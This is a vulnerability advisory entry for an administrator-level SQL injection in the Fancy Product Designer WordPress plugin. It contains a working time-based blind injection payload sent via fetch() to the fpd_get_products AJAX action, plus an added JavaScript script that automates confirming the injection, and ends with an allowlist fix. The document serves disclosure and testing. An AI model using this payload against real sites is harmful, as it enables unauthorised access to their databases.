wpvulndb
WPVDB-ID: 4B8B9638-D52A-40BC-B298-AE1C74788C18
Published: Feb 20, 2024

Fancy Product Designer < 6.1.5 - Admin+ SQL Injection

2024-02-20 00:00:00
Ivan Spiridonov
wpscan.com
sql injection
admin+ module
security vulnerability
wordpress plugin

AI Score: 7.4 (Confidence: Low)

EPSS: 0 (Percentile: 9.0%)

Description

The plugin does not properly sanitise and escape a parameter (the filter_by parameter of the fpd_get_products AJAX action, as used in the PoC below) before using it in a SQL statement, leading to a SQL injection exploitable by administrators.

PoC

- Log in as an administrator, and visit /wp-admin/.
- Add a Catalog Product in /wp-admin/admin.php?page=fancy_product_designer
- Search for "fpd_dismiss_notification" in the page's source, and note down the associated nonce.
- Send the following fetch() command in your browser's console, replacing $NONCE with the nonce:

fetch('/wp-admin/admin-ajax.php?action=fpd_get_products&_ajax_nonce=$NONCE&filter_by=ID%2c(select*from(select(sleep(20)))a)&sort_by=ASC&page=1&type=catalog').then(x=>x.text()).then(x=>console.log(x))

Notice that it takes approximately 20 seconds for the server to answer, confirming that the injected SQL statement was executed. The injection is blind and time-based: nothing from the query is reflected in the response, so the delay is the only signal.
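The following is an added example written for this page, not code from the WPScan advisory or from the plugin. It rebuilds the PoC request above with URLSearchParams so the payload is encoded correctly, and it times a baseline request (sleep(0), same query shape) before the delayed one, so a slow server is not mistaken for a confirmed injection. The threshold in confirmsInjection (80% of the requested sleep) and the helper names are assumptions made for this example; the advisory does not say which SQL clause filter_by lands in, so the payload is used exactly as the advisory gives it.

```javascript
// Added example (not the advisory's or the plugin's code): a console-runnable
// version of the WPScan PoC for fpd_get_products with a baseline comparison.

// Build the PoC URL. URLSearchParams percent-encodes the comma and parentheses
// in the payload; the server decodes them before the value reaches the query.
// sleepSeconds = 0 yields the same query shape with no delay (the baseline).
function buildFpdPocUrl(nonce, sleepSeconds, origin = '') {
  // Payload taken verbatim from the advisory, with the sleep duration parameterised.
  const payload = `ID,(select*from(select(sleep(${sleepSeconds})))a)`;
  const params = new URLSearchParams({
    action: 'fpd_get_products',
    _ajax_nonce: nonce,
    filter_by: payload,
    sort_by: 'ASC',
    page: '1',
    type: 'catalog',
  });
  return `${origin}/wp-admin/admin-ajax.php?${params.toString()}`;
}

// Time-based blind SQLi is confirmed only if the delayed request took longer
// than the baseline by most of the requested sleep (0.8 is an assumed margin
// that tolerates jitter without accepting an unrelated slow response).
function confirmsInjection(baselineMs, delayedMs, sleepSeconds) {
  const expectedMs = sleepSeconds * 1000;
  return delayedMs - baselineMs >= expectedMs * 0.8;
}

// Measure wall-clock time for one request, reading the body to completion
// so the measurement covers the whole response, not just the headers.
async function timeRequest(url) {
  const start = Date.now();
  const resp = await fetch(url, { credentials: 'same-origin' });
  await resp.text();
  return Date.now() - start;
}

// Run baseline and delayed requests and report the verdict. Call from the
// browser console of a logged-in administrator, e.g. runPoc('<nonce>').
async function runPoc(nonce, sleepSeconds = 20) {
  const baseline = await timeRequest(buildFpdPocUrl(nonce, 0));
  const delayed = await timeRequest(buildFpdPocUrl(nonce, sleepSeconds));
  return {
    baselineMs: baseline,
    delayedMs: delayed,
    confirmed: confirmsInjection(baseline, delayed, sleepSeconds),
  };
}
```

Because the injected value is used where a column name or sort expression belongs, it cannot be bound as a prepared-statement parameter; the usual fix for this class of bug is to map the user-supplied filter_by value against a fixed allowlist of column names and reject anything else before building the query.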
